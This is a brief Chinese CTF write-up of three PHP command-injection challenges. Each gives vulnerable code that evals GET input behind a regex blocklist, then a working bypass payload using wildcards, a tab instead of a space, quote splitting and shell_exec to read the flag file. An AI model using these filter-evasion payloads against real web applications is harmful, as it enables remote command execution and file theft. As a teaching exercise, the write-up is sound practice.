题目1
if (isset($_GET["Command"]) && $_GET["Command"]) {
$command = $_GET["Command"];
if (!preg_match("/f|a|g|flag|cat|tac|more|ls|\'|\*|system|exec|popen|passthru|shell_exec|assert|eval/i", $command)) {
eval($command);
} else {
echo "nonono~";
}
}
过滤了一些flag关键字和命令执行函数,发现echo、nl可用,用通配符?替代被过滤的关键字。
payload
?Command=echo `nl /?l??`;
题目2
if (isset($_GET["Command1"]) && isset($_GET["Command2"])) {
$com1 = $_GET["Command1"];
$com2 = $_GET["Command2"];
if (!preg_match("/cat|tac|nl|more|less|tail|head|ls|\'|\*| |flag/i", $com2)) {
$com1($com2);
} else {
echo "nonono~";
}
}
过滤和空格和一些输出内容的函数,用以下方法绕过:
payload
?Command1=system&Command2=ta"c"%09/fla?
题目3
if (isset($_GET["Command1"])) {
$com1 = $_GET["Command1"];
if (!preg_match("/eval|assert|system|passthru|\`|file_get_contents|readfile|show_source|include|include_once|require|require_once|highlight_file|\?|flag/i", $com1)) {
eval($com1);
} else {
echo "nonono~";
}
}
过滤了一些命令执行函数,用shell_exec可以绕过,注意shell_exec没有输出,需要用echo输出结果,用两个单引号过滤对flag的过滤,反斜杠\也可以。
payload
?Command1=echo shell_exec("tac /fl''ag");